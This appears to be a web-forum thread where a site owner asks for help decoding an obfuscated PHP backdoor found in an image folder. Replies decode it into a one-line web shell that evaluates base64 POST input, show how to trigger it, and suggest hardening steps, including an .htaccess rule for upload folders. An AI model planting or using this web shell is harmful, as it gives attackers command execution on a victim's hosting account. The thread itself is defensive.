I'm not sure if this is the right section to post this (if not, please mods delete this thread). OK, so can someone please decode this eval base64 code: eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7')); I found the file was something like gifimg.php in my image folder, and I also cleaned all PHP files that had this code. Do you have any suggestions on how to protect the folders, or something else, to stay away from these hacks?
It decodes as if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found'); Tighten your security.
Yeah, that's not good. I'm assuming it's from software that utilizes TinyMCE and hasn't been updated in a while.
POST /thispage.php?e=ZGly will show your directory listing. This is a backdoor in your site. Any web user can run any command under your hosting account.
Thank you guys. This is what happened: after I first cleaned the files and that gifimg.php (inside it was only the eval base64 code), the same thing happened the other day. It was also showing some <script src> code pointing to another website. I googled that site and Google had a warning about it. So the next day I found some info about changing permissions and passwords. I changed everything, starting from hosting passwords, FTP, and dir permissions, and I blocked the IP of that site and its hosting provider's IP. As a result, now on the 3rd day, I checked the files and the code does not appear, nor does that gifimg.php file. Do you think what I did were the right steps to stay away from this hacking stuff? Any suggestions... Thanks in advance.
Do not use the same passwords for control panel, FTP, DB, etc. If you are not sure that your script is safe, and you have directories that require upload rights, such as /avatars or /uploads, you can add this in a .htaccess and upload it into these directories:

<Files *.php>
ForceType application/octet-stream
Header set Content-Disposition attachment
</Files>
<Files *.php3>
ForceType application/octet-stream
Header set Content-Disposition attachment
</Files>
<Files *.phtml>
ForceType application/octet-stream
Header set Content-Disposition attachment
</Files>

In such a way these files can be downloaded, but not executed.